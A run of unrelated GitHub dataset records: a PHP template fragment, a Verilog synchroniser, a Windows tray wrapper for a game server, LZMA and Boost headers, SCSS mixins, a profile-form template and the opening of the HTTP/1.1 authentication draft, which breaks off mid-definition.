<?php Utils::theNext($this);?>
</div>
</div>
<?php $this->need('comments.php'); ?>
<?php $this->need('footer-info.php'); ?>
</div>
<?php $this->need('nav-left.php'); ?>
<?php if($this->options->bloglayout!='1'):?>
<?php $this->need('aside.php'); ?>
<?php endif;?>
</div>
<?php $this->need('footer.php'); ?> | {
"pile_set_name": "Github"
} |
// Copyright Jamie Iles, 2017
//
// This file is part of s80x86.
//
// s80x86 is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// s80x86 is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with s80x86. If not, see <http://www.gnu.org/licenses/>.
`default_nettype none
module BitSync(input logic clk,
input logic reset,
input logic d,
output logic q);
`ifdef verilator
reg p1;
reg p2;
assign q = p2;
always_ff @(posedge clk or posedge reset)
if (reset)
p1 <= 1'b0;
else
p1 <= d;
always_ff @(posedge clk or posedge reset)
if (reset)
p2 <= 1'b0;
else
p2 <= p1;
`else
altera_std_synchronizer sync(.clk(clk),
.reset_n(~reset),
.din(d),
.dout(q));
`endif
endmodule
| {
"pile_set_name": "Github"
} |
#ifdef WIN32
#include "inexor/shared/cube_types.hpp"
#include "inexor/shared/cube_unicode.hpp"
#include "inexor/shared/cube_loops.hpp"
#include "inexor/shared/cube_vector.hpp"
#include "inexor/shared/cube_queue.hpp"
#include "inexor/io/Logging.hpp"
#include "inexor/io/Error.hpp"
#include <windows.h>
#include <shellapi.h>
#define LOGSTRLEN 512
#define IDI_ICON1 1
static string apptip = "";
static HINSTANCE appinstance = NULL;
static ATOM wndclass = 0;
static HWND appwindow = NULL, conwindow = NULL;
static HICON appicon = NULL;
static HMENU appmenu = NULL;
static HANDLE outhandle = NULL;
static const int MAXLOGLINES = 200;
struct logline { int len; char buf[LOGSTRLEN]; };
static queue<logline, MAXLOGLINES> loglines;
static void cleanupsystemtray()
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
Shell_NotifyIcon(NIM_DELETE, &nid);
}
static bool setupsystemtray(UINT uCallbackMessage)
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
nid.uCallbackMessage = uCallbackMessage;
nid.uFlags = NIF_MESSAGE | NIF_ICON | NIF_TIP;
nid.hIcon = appicon;
strcpy(nid.szTip, apptip);
if(Shell_NotifyIcon(NIM_ADD, &nid) != TRUE)
return false;
atexit(cleanupsystemtray);
return true;
}
#if 0
static bool modifysystemtray()
{
NOTIFYICONDATA nid;
memset(&nid, 0, sizeof(nid));
nid.cbSize = sizeof(nid);
nid.hWnd = appwindow;
nid.uID = IDI_ICON1;
nid.uFlags = NIF_TIP;
strcpy(nid.szTip, apptip);
return Shell_NotifyIcon(NIM_MODIFY, &nid) == TRUE;
}
#endif
static void cleanupwindow()
{
if(!appinstance) return;
if(appmenu)
{
DestroyMenu(appmenu);
appmenu = NULL;
}
if(wndclass)
{
UnregisterClass(MAKEINTATOM(wndclass), appinstance);
wndclass = 0;
}
}
static BOOL WINAPI consolehandler(DWORD dwCtrlType)
{
switch(dwCtrlType)
{
case CTRL_C_EVENT:
case CTRL_BREAK_EVENT:
case CTRL_CLOSE_EVENT:
exit(EXIT_SUCCESS);
return TRUE;
}
return FALSE;
}
static void writeline(logline &line)
{
static uchar ubuf[512];
size_t len = strlen(line.buf), carry = 0;
while(carry < len)
{
size_t numu = encodeutf8(ubuf, sizeof(ubuf), &((uchar *)line.buf)[carry], len - carry, &carry);
DWORD written = 0;
WriteConsole(outhandle, ubuf, numu, &written, NULL);
}
}
static void setupconsole()
{
if(conwindow) return;
if(!AllocConsole()) return;
SetConsoleCtrlHandler(consolehandler, TRUE);
conwindow = GetConsoleWindow();
SetConsoleTitle(apptip);
//SendMessage(conwindow, WM_SETICON, ICON_SMALL, (LPARAM)appicon);
SendMessage(conwindow, WM_SETICON, ICON_BIG, (LPARAM)appicon);
outhandle = GetStdHandle(STD_OUTPUT_HANDLE);
CONSOLE_SCREEN_BUFFER_INFO coninfo;
GetConsoleScreenBufferInfo(outhandle, &coninfo);
coninfo.dwSize.Y = MAXLOGLINES;
SetConsoleScreenBufferSize(outhandle, coninfo.dwSize);
SetConsoleCP(CP_UTF8);
SetConsoleOutputCP(CP_UTF8);
loopv(loglines) writeline(loglines[i]);
}
enum
{
MENU_OPENCONSOLE = 0,
MENU_SHOWCONSOLE,
MENU_HIDECONSOLE,
MENU_EXIT
};
static LRESULT CALLBACK handlemessages(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch(uMsg)
{
case WM_APP:
SetForegroundWindow(hWnd);
switch(lParam)
{
//case WM_MOUSEMOVE:
// break;
case WM_LBUTTONUP:
case WM_RBUTTONUP:
{
POINT pos;
GetCursorPos(&pos);
TrackPopupMenu(appmenu, TPM_CENTERALIGN|TPM_BOTTOMALIGN|TPM_RIGHTBUTTON, pos.x, pos.y, 0, hWnd, NULL);
PostMessage(hWnd, WM_NULL, 0, 0);
break;
}
}
return 0;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case MENU_OPENCONSOLE:
setupconsole();
if(conwindow) ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_HIDECONSOLE, "Hide Console");
break;
case MENU_SHOWCONSOLE:
ShowWindow(conwindow, SW_SHOWNORMAL);
ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_HIDECONSOLE, "Hide Console");
break;
case MENU_HIDECONSOLE:
ShowWindow(conwindow, SW_HIDE);
ModifyMenu(appmenu, 0, MF_BYPOSITION|MF_STRING, MENU_SHOWCONSOLE, "Show Console");
break;
case MENU_EXIT:
PostMessage(hWnd, WM_CLOSE, 0, 0);
break;
}
return 0;
case WM_CLOSE:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hWnd, uMsg, wParam, lParam);
}
static void setupwindow(const char *title)
{
copystring(apptip, title);
//appinstance = GetModuleHandle(NULL);
if(!appinstance) fatal("failed getting application instance");
appicon = LoadIcon(appinstance, MAKEINTRESOURCE(IDI_ICON1));//(HICON)LoadImage(appinstance, MAKEINTRESOURCE(IDI_ICON1), IMAGE_ICON, 0, 0, LR_DEFAULTSIZE);
if(!appicon) Log.start_stop->error("failed loading icon");
appmenu = CreatePopupMenu();
if(!appmenu) fatal("failed creating popup menu");
AppendMenu(appmenu, MF_STRING, MENU_OPENCONSOLE, "Open Console");
AppendMenu(appmenu, MF_SEPARATOR, 0, NULL);
AppendMenu(appmenu, MF_STRING, MENU_EXIT, "Exit");
//SetMenuDefaultItem(appmenu, 0, FALSE);
WNDCLASS wc;
memset(&wc, 0, sizeof(wc));
wc.hCursor = NULL; //LoadCursor(NULL, IDC_ARROW);
wc.hIcon = appicon;
wc.lpszMenuName = NULL;
wc.lpszClassName = title;
wc.style = 0;
wc.hInstance = appinstance;
wc.lpfnWndProc = handlemessages;
wc.cbWndExtra = 0;
wc.cbClsExtra = 0;
wndclass = RegisterClass(&wc);
if(!wndclass) fatal("failed registering window class");
appwindow = CreateWindow(MAKEINTATOM(wndclass), title, 0, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, HWND_MESSAGE, NULL, appinstance, NULL);
if(!appwindow) fatal("failed creating window");
atexit(cleanupwindow);
if(!setupsystemtray(WM_APP)) fatal("failed adding to system tray");
}
static char *parsecommandline(const char *src, vector<char *> &args)
{
char *buf = new char[strlen(src) + 1], *dst = buf;
for(;;)
{
while(isspace(*src)) src++;
if(!*src) break;
args.add(dst);
for(bool quoted = false; *src && (quoted || !isspace(*src)); src++)
{
if(*src != '"') *dst++ = *src;
else if(dst > buf && src[-1] == '\\') dst[-1] = '"';
else quoted = !quoted;
}
*dst++ = '\0';
}
args.add(NULL);
return buf;
}
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR szCmdLine, int sw)
{
vector<char *> args;
char *buf = parsecommandline(GetCommandLine(), args);
appinstance = hInst;
setupwindow("Inexor server");
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
extern int standalonemain(int argc, char **argv);
int status = standalonemain(args.length()-1, args.getbuf());
delete[] buf;
exit(status);
return 0;
}
#endif
| {
"pile_set_name": "Github"
} |
/* Types.h -- Basic types
2008-11-23 : Igor Pavlov : Public domain */
#ifndef __7Z_TYPES_H
#define __7Z_TYPES_H
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#endif
#define SZ_OK 0
#define SZ_ERROR_DATA 1
#define SZ_ERROR_MEM 2
#define SZ_ERROR_CRC 3
#define SZ_ERROR_UNSUPPORTED 4
#define SZ_ERROR_PARAM 5
#define SZ_ERROR_INPUT_EOF 6
#define SZ_ERROR_OUTPUT_EOF 7
#define SZ_ERROR_READ 8
#define SZ_ERROR_WRITE 9
#define SZ_ERROR_PROGRESS 10
#define SZ_ERROR_FAIL 11
#define SZ_ERROR_THREAD 12
#define SZ_ERROR_ARCHIVE 16
#define SZ_ERROR_NO_ARCHIVE 17
typedef int SRes;
#ifdef _WIN32
typedef DWORD WRes;
#else
typedef int WRes;
#endif
#ifndef RINOK
#define RINOK(x) { int __result__ = (x); if (__result__ != 0) return __result__; }
#endif
typedef unsigned char Byte;
typedef short Int16;
typedef unsigned short UInt16;
#ifdef _LZMA_UINT32_IS_ULONG
typedef long Int32;
typedef unsigned long UInt32;
#else
typedef int Int32;
typedef unsigned int UInt32;
#endif
#ifdef _SZ_NO_INT_64
/* define _SZ_NO_INT_64, if your compiler doesn't support 64-bit integers.
NOTES: Some code will work incorrectly in that case! */
typedef long Int64;
typedef unsigned long UInt64;
#else
#if defined(_MSC_VER) || defined(__BORLANDC__)
typedef __int64 Int64;
typedef unsigned __int64 UInt64;
#else
typedef long long int Int64;
typedef unsigned long long int UInt64;
#endif
#endif
#ifdef _LZMA_NO_SYSTEM_SIZE_T
typedef UInt32 SizeT;
#else
typedef size_t SizeT;
#endif
typedef int Bool;
#define True 1
#define False 0
#ifdef _MSC_VER
#if _MSC_VER >= 1300
#define MY_NO_INLINE __declspec(noinline)
#else
#define MY_NO_INLINE
#endif
#define MY_CDECL __cdecl
#define MY_STD_CALL __stdcall
#define MY_FAST_CALL MY_NO_INLINE __fastcall
#else
#define MY_CDECL
#define MY_STD_CALL
#define MY_FAST_CALL
#endif
/* The following interfaces use first parameter as pointer to structure */
typedef struct
{
SRes (*Read)(void *p, void *buf, size_t *size);
/* if (input(*size) != 0 && output(*size) == 0) means end_of_stream.
(output(*size) < input(*size)) is allowed */
} ISeqInStream;
/* it can return SZ_ERROR_INPUT_EOF */
SRes SeqInStream_Read(ISeqInStream *stream, void *buf, size_t size);
SRes SeqInStream_Read2(ISeqInStream *stream, void *buf, size_t size, SRes errorType);
SRes SeqInStream_ReadByte(ISeqInStream *stream, Byte *buf);
typedef struct
{
size_t (*Write)(void *p, const void *buf, size_t size);
/* Returns: result - the number of actually written bytes.
(result < size) means error */
} ISeqOutStream;
typedef enum
{
SZ_SEEK_SET = 0,
SZ_SEEK_CUR = 1,
SZ_SEEK_END = 2
} ESzSeek;
typedef struct
{
SRes (*Read)(void *p, void *buf, size_t *size); /* same as ISeqInStream::Read */
SRes (*Seek)(void *p, Int64 *pos, ESzSeek origin);
} ISeekInStream;
typedef struct
{
SRes (*Look)(void *p, void **buf, size_t *size);
/* if (input(*size) != 0 && output(*size) == 0) means end_of_stream.
(output(*size) > input(*size)) is not allowed
(output(*size) < input(*size)) is allowed */
SRes (*Skip)(void *p, size_t offset);
/* offset must be <= output(*size) of Look */
SRes (*Read)(void *p, void *buf, size_t *size);
/* reads directly (without buffer). It's same as ISeqInStream::Read */
SRes (*Seek)(void *p, Int64 *pos, ESzSeek origin);
} ILookInStream;
SRes LookInStream_LookRead(ILookInStream *stream, void *buf, size_t *size);
SRes LookInStream_SeekTo(ILookInStream *stream, UInt64 offset);
/* reads via ILookInStream::Read */
SRes LookInStream_Read2(ILookInStream *stream, void *buf, size_t size, SRes errorType);
SRes LookInStream_Read(ILookInStream *stream, void *buf, size_t size);
#define LookToRead_BUF_SIZE (1 << 14)
typedef struct
{
ILookInStream s;
ISeekInStream *realStream;
size_t pos;
size_t size;
Byte buf[LookToRead_BUF_SIZE];
} CLookToRead;
void LookToRead_CreateVTable(CLookToRead *p, int lookahead);
void LookToRead_Init(CLookToRead *p);
typedef struct
{
ISeqInStream s;
ILookInStream *realStream;
} CSecToLook;
void SecToLook_CreateVTable(CSecToLook *p);
typedef struct
{
ISeqInStream s;
ILookInStream *realStream;
} CSecToRead;
void SecToRead_CreateVTable(CSecToRead *p);
typedef struct
{
SRes (*Progress)(void *p, UInt64 inSize, UInt64 outSize);
/* Returns: result. (result != SZ_OK) means break.
Value (UInt64)(Int64)-1 for size means unknown value. */
} ICompressProgress;
typedef struct
{
void *(*Alloc)(void *p, size_t size);
void (*Free)(void *p, void *address); /* address can be 0 */
} ISzAlloc;
#define IAlloc_Alloc(p, size) (p)->Alloc((p), size)
#define IAlloc_Free(p, a) (p)->Free((p), a)
#endif
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2009-2012 Lorenzo Caminiti
// Distributed under the Boost Software License, Version 1.0
// (see accompanying file LICENSE_1_0.txt or a copy at
// http://www.boost.org/LICENSE_1_0.txt)
// Home at http://www.boost.org/libs/local_function
#ifndef BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_HPP_
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_HPP_
#include <boost/local_function/detail/preprocessor/keyword/facility/is.hpp>
#include <boost/local_function/detail/preprocessor/keyword/facility/add.hpp>
#include <boost/local_function/detail/preprocessor/keyword/facility/remove.hpp>
// PRIVATE //
// These are not local macros -- DO NOT #UNDEF.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS_default (1)/* unary */
#define default_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS (1)/* unary */
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_default/*nothing*/
#define default_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE/*nothing*/
// PUBLIC //
// Is.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_IS_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS_)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK(token) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_IS_BACK(token, \
_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_IS)
// Remove.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_REMOVE_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE_BACK(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_REMOVE_BACK(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK, \
_BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_REMOVE)
// Add.
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_ADD_FRONT(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_ADD_FRONT(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_FRONT, default)
#define BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_DEFAULT_ADD_BACK(tokens) \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_FACILITY_ADD_BACK(tokens, \
BOOST_LOCAL_FUNCTION_DETAIL_PP_KEYWORD_IS_DEFAULT_BACK, default)
#endif // #include guard
| {
"pile_set_name": "Github"
} |
// Image Mixins
// - Responsive image
// - Retina image
// Responsive image
//
// Keep images from scaling beyond the width of their parents.
@mixin img-fluid {
// Part 1: Set a maximum relative to the parent
max-width: 100%;
// Part 2: Override the height to auto, otherwise images will be stretched
// when setting a width and height attribute on the img element.
height: auto;
}
// Retina image
//
// Short retina mixin for setting background-image and -size.
@mixin img-retina($file-1x, $file-2x, $width-1x, $height-1x) {
background-image: url($file-1x);
// Autoprefixer takes care of adding -webkit-min-device-pixel-ratio and -o-min-device-pixel-ratio,
// but doesn't convert dppx=>dpi.
// There's no such thing as unprefixed min-device-pixel-ratio since it's nonstandard.
// Compatibility info: https://caniuse.com/#feat=css-media-resolution
@media only screen and (min-resolution: 192dpi), // IE9-11 don't support dppx
only screen and (min-resolution: 2dppx) { // Standardized
background-image: url($file-2x);
background-size: $width-1x $height-1x;
}
@include deprecate("`img-retina()`", "v4.3.0", "v5");
}
| {
"pile_set_name": "Github"
} |
<div style="padding:20px">
<form method="post" action="#{ActionLink}" class="ajaxPostForm">
<table style="width: 95%; ">
<tr>
<td valign="top" class="profile_panel">
<table border="0" style="">
<tr>
<td class="tdLeft">_{nickName}</td>
<td><span class="strong">#{m.NickName}</span><span class="note left5">(ID:#{m.Id})</span></td>
</tr>
<tr>
<td class="tdLeft">_{realName}</td>
<td><input name="Name" type="text" value="#{m.Name}">
<span class="left10">空间名称 <input name="Title" type="text" value="#{m.Title}"> <span class="note">(最长20个字)</span> </span>
</td>
</tr>
<tr>
<td class="tdLeft">_{birthday}</td>
<td>#{Year} #{Month} #{Day}
</tr>
<tr>
<td class="tdLeft">_{gender}</td>
<td>#{Gender}
<span class="left10">_{zodiac}#{Zodiac}</span>
<span class="left10">_{blood}#{Blood}</span>
<span class="left10">_{relationship}#{Relationship}</span>
<span class="left10">_{degree}#{Degree}</span>
</td>
</tr>
<tr>
<td class="tdLeft"> </td>
<td> </td>
</tr>
<tr>
<td class="tdLeft">_{registerReason}</td>
<td>#{Purpose}</td>
</tr>
<tr>
<td class="tdLeft">_{hometown}</td>
<td>#{ProvinceId1}
<input name="City1" type="text" value="#{m.City1}" style="width: 82px"></td>
</tr>
<tr>
<td class="tdLeft">_{region}</td>
<td>#{ProvinceId2}
<input name="City2" type="text" value="#{m.City2}" style="width: 82px"></td>
</tr>
</table>
</td>
</tr>
<!-- BEGIN sexyInfo -->
<!-- END sexyInfo -->
<tr><td colspan="2"> </td></tr>
<tr>
<td valign="top" class="profile_panel" colspan="2">
_{selfIntroductionTip}
<span class="note">(长度:_{fromChar} #{m.UserDescriptionMin} _{toChar} #{m.UserDescriptionMax})</span>
<br>
<textarea name="Description" style="width: 90%; height: 96px">#{m.Description}</textarea>
<br /><br/>
_{signatureTip}
<span class="note">(长度:长度:_{fromChar} #{m.UserSignatureMin} _{toChar} #{m.UserSignatureMax})</span>
<br>
<textarea name="Signature" style="width: 90%; height: 106px">#{m.Signature}</textarea>
</td>
</tr>
</table>
<div style="margin-left:120px;">
<input name="Submit1" type="submit" class="btnSave btn" value="_{saveUpdate}">
</div>
</form>
</div>
| {
"pile_set_name": "Github"
} |
HTTPbis Working Group R. Fielding, Ed.
Internet-Draft Adobe
Obsoletes: 2616 (if approved) J. Gettys
Updates: 2617 (if approved) Alcatel-Lucent
Intended status: Standards Track J. Mogul
Expires: October 20, 2011 HP
H. Frystyk
Microsoft
L. Masinter
Adobe
P. Leach
Microsoft
T. Berners-Lee
W3C/MIT
Y. Lafon, Ed.
W3C
J. Reschke, Ed.
greenbytes
April 18, 2011
HTTP/1.1, part 7: Authentication
draft-ietf-httpbis-p7-auth-14
Abstract
The Hypertext Transfer Protocol (HTTP) is an application-level
protocol for distributed, collaborative, hypermedia information
systems. HTTP has been in use by the World Wide Web global
information initiative since 1990. This document is Part 7 of the
seven-part specification that defines the protocol referred to as
"HTTP/1.1" and, taken together, obsoletes RFC 2616. Part 7 defines
HTTP Authentication.
Editorial Note (To be removed by RFC Editor)
Discussion of this draft should take place on the HTTPBIS working
group mailing list ([email protected]), which is archived at
<http://lists.w3.org/Archives/Public/ietf-http-wg/>.
The current issues list is at
<http://tools.ietf.org/wg/httpbis/trac/report/3> and related
documents (including fancy diffs) can be found at
<http://tools.ietf.org/wg/httpbis/>.
The changes in this draft are summarized in Appendix C.15.
Status of This Memo
Fielding, et al. Expires October 20, 2011 [Page 1]
Internet-Draft HTTP/1.1, Part 7 April 2011
This Internet-Draft is submitted in full conformance with the
provisions of BCP 78 and BCP 79.
Internet-Drafts are working documents of the Internet Engineering
Task Force (IETF). Note that other groups may also distribute
working documents as Internet-Drafts. The list of current Internet-
Drafts is at http://datatracker.ietf.org/drafts/current/.
Internet-Drafts are draft documents valid for a maximum of six months
and may be updated, replaced, or obsoleted by other documents at any
time. It is inappropriate to use Internet-Drafts as reference
material or to cite them other than as "work in progress."
This Internet-Draft will expire on October 20, 2011.
Copyright Notice
Copyright (c) 2011 IETF Trust and the persons identified as the
document authors. All rights reserved.
This document is subject to BCP 78 and the IETF Trust's Legal
Provisions Relating to IETF Documents
(http://trustee.ietf.org/license-info) in effect on the date of
publication of this document. Please review these documents
carefully, as they describe your rights and restrictions with respect
to this document. Code Components extracted from this document must
include Simplified BSD License text as described in Section 4.e of
the Trust Legal Provisions and are provided without warranty as
described in the Simplified BSD License.
This document may contain material from IETF Documents or IETF
Contributions published or made publicly available before November
10, 2008. The person(s) controlling the copyright in some of this
material may not have granted the IETF Trust the right to allow
modifications of such material outside the IETF Standards Process.
Without obtaining an adequate license from the person(s) controlling
the copyright in such materials, this document may not be modified
outside the IETF Standards Process, and derivative works of it may
not be created outside the IETF Standards Process, except to format
it for publication as an RFC or to translate it into languages other
than English.
Fielding, et al. Expires October 20, 2011 [Page 2]
Internet-Draft HTTP/1.1, Part 7 April 2011
Table of Contents
1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1. Requirements . . . . . . . . . . . . . . . . . . . . . . . 4
1.2. Syntax Notation . . . . . . . . . . . . . . . . . . . . . 4
1.2.1. Core Rules . . . . . . . . . . . . . . . . . . . . . . 4
2. Access Authentication Framework . . . . . . . . . . . . . . . 5
2.1. Authentication Scheme Registry . . . . . . . . . . . . . . 7
3. Status Code Definitions . . . . . . . . . . . . . . . . . . . 7
3.1. 401 Unauthorized . . . . . . . . . . . . . . . . . . . . . 7
3.2. 407 Proxy Authentication Required . . . . . . . . . . . . 7
4. Header Field Definitions . . . . . . . . . . . . . . . . . . . 8
4.1. Authorization . . . . . . . . . . . . . . . . . . . . . . 8
4.2. Proxy-Authenticate . . . . . . . . . . . . . . . . . . . . 9
4.3. Proxy-Authorization . . . . . . . . . . . . . . . . . . . 9
4.4. WWW-Authenticate . . . . . . . . . . . . . . . . . . . . . 9
5. IANA Considerations . . . . . . . . . . . . . . . . . . . . . 10
5.1. Authenticaton Scheme Registry . . . . . . . . . . . . . . 10
5.2. Status Code Registration . . . . . . . . . . . . . . . . . 10
5.3. Header Field Registration . . . . . . . . . . . . . . . . 10
6. Security Considerations . . . . . . . . . . . . . . . . . . . 10
6.1. Authentication Credentials and Idle Clients . . . . . . . 11
7. Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . 11
8. References . . . . . . . . . . . . . . . . . . . . . . . . . . 11
8.1. Normative References . . . . . . . . . . . . . . . . . . . 11
8.2. Informative References . . . . . . . . . . . . . . . . . . 12
Appendix A. Changes from RFC 2616 . . . . . . . . . . . . . . . . 12
Appendix B. Collected ABNF . . . . . . . . . . . . . . . . . . . 13
Appendix C. Change Log (to be removed by RFC Editor before
publication) . . . . . . . . . . . . . . . . . . . . 13
C.1. Since RFC 2616 . . . . . . . . . . . . . . . . . . . . . . 13
C.2. Since draft-ietf-httpbis-p7-auth-00 . . . . . . . . . . . 13
C.3. Since draft-ietf-httpbis-p7-auth-01 . . . . . . . . . . . 14
C.4. Since draft-ietf-httpbis-p7-auth-02 . . . . . . . . . . . 14
C.5. Since draft-ietf-httpbis-p7-auth-03 . . . . . . . . . . . 14
C.6. Since draft-ietf-httpbis-p7-auth-04 . . . . . . . . . . . 14
C.7. Since draft-ietf-httpbis-p7-auth-05 . . . . . . . . . . . 14
C.8. Since draft-ietf-httpbis-p7-auth-06 . . . . . . . . . . . 14
C.9. Since draft-ietf-httpbis-p7-auth-07 . . . . . . . . . . . 15
C.10. Since draft-ietf-httpbis-p7-auth-08 . . . . . . . . . . . 15
C.11. Since draft-ietf-httpbis-p7-auth-09 . . . . . . . . . . . 15
C.12. Since draft-ietf-httpbis-p7-auth-10 . . . . . . . . . . . 15
C.13. Since draft-ietf-httpbis-p7-auth-11 . . . . . . . . . . . 15
C.14. Since draft-ietf-httpbis-p7-auth-12 . . . . . . . . . . . 15
C.15. Since draft-ietf-httpbis-p7-auth-13 . . . . . . . . . . . 16
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Fielding, et al. Expires October 20, 2011 [Page 3]
Internet-Draft HTTP/1.1, Part 7 April 2011
1. Introduction
This document defines HTTP/1.1 access control and authentication. It
includes the relevant parts of RFC 2616 with only minor changes, plus
the general framework for HTTP authentication, as previously defined
in "HTTP Authentication: Basic and Digest Access Authentication"
([RFC2617]).
HTTP provides several OPTIONAL challenge-response authentication
mechanisms which can be used by a server to challenge a client
request and by a client to provide authentication information. The
"basic" and "digest" authentication schemes continue to be specified
in RFC 2617.
1.1. Requirements
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT",
"SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this
document are to be interpreted as described in [RFC2119].
An implementation is not compliant if it fails to satisfy one or more
of the "MUST" or "REQUIRED" level requirements for the protocols it
implements. An implementation that satisfies all the "MUST" or
"REQUIRED" level and all the "SHOULD" level requirements for its
protocols is said to be "unconditionally compliant"; one that
satisfies all the "MUST" level requirements but not all the "SHOULD"
level requirements for its protocols is said to be "conditionally
compliant".
1.2. Syntax Notation
This specification uses the ABNF syntax defined in Section 1.2 of
[Part1] (which extends the syntax defined in [RFC5234] with a list
rule). Appendix B shows the collected ABNF, with the list rule
expanded.
The following core rules are included by reference, as defined in
[RFC5234], Appendix B.1: ALPHA (letters), CR (carriage return), CRLF
(CR LF), CTL (controls), DIGIT (decimal 0-9), DQUOTE (double quote),
HEXDIG (hexadecimal 0-9/A-F/a-f), LF (line feed), OCTET (any 8-bit
sequence of data), SP (space), VCHAR (any visible USASCII character),
and WSP (whitespace).
1.2.1. Core Rules
The core rules below are defined in Section 1.2.2 of [Part1]:
Fielding, et al. Expires October 20, 2011 [Page 4]
Internet-Draft HTTP/1.1, Part 7 April 2011
quoted-string = <quoted-string, defined in [Part1], Section 1.2.2>
token = <token, defined in [Part1], Section 1.2.2>
OWS = <OWS, defined in [Part1], Section 1.2.2>
2. Access Authentication Framework
HTTP provides a simple challenge-response authentication mechanism
that can be used by a server to challenge a client request and by a
client to provide authentication information. It uses an extensible,
case-insensitive token to identify the authentication scheme,
followed by a comma-separated list of attribute-value pairs which
carry the parameters necessary for achieving authentication via that
scheme.
auth-scheme = token
auth-param = token "=" ( token / quoted-string )
The 401 (Unauthorized) response message is used by an origin server
to challenge the authorization of a user agent. This response MUST
include a WWW-Authenticate header field containing at least one
challenge applicable to the requested resource. The 407 (Proxy
Authentication Required) response message is used by a proxy to
challenge the authorization of a client and MUST include a Proxy-
Authenticate header field containing at least one challenge
applicable to the proxy for the requested resource.
challenge = auth-scheme 1*SP 1#auth-param
Note: User agents will need to take special care in parsing the
WWW-Authenticate or Proxy-Authenticate header field value if it
contains more than one challenge, or if more than one WWW-
Authenticate header field is provided, since the contents of a
challenge can itself contain a comma-separated list of
authentication parameters.
Note: Many browsers fail to parse challenges containing unknown
schemes. A workaround for this problem is to list well-supported
schemes (such as "basic") first.
The authentication parameter realm is defined for all authentication
schemes:
realm = "realm" "=" realm-value
realm-value = quoted-string
The realm directive (case-insensitive) is required for all
authentication schemes that issue a challenge. The realm value
(case-sensitive), in combination with the canonical root URI (the
Fielding, et al. Expires October 20, 2011 [Page 5]
Internet-Draft HTTP/1.1, Part 7 April 2011
scheme and authority components of the effective request URI; see
Section 4.3 of [Part1]) of the server being accessed, defines the
protection space. These realms allow the protected resources on a
server to be partitioned into a set of protection spaces, each with
its own authentication scheme and/or authorization database. The
realm value is a string, generally assigned by the origin server,
which can have additional semantics specific to the authentication
scheme. Note that there can be multiple challenges with the same
auth-scheme but different realms.
A user agent that wishes to authenticate itself with an origin server
-- usually, but not necessarily, after receiving a 401 (Unauthorized)
-- MAY do so by including an Authorization header field with the
request. A client that wishes to authenticate itself with a proxy --
usually, but not necessarily, after receiving a 407 (Proxy
Authentication Required) -- MAY do so by including a Proxy-
Authorization header field with the request. Both the Authorization
field value and the Proxy-Authorization field value consist of
credentials containing the authentication information of the client
for the realm of the resource being requested. The user agent MUST
choose to use one of the challenges with the strongest auth-scheme it
understands and request credentials from the user based upon that
challenge.
credentials = auth-scheme ( token
/ quoted-string
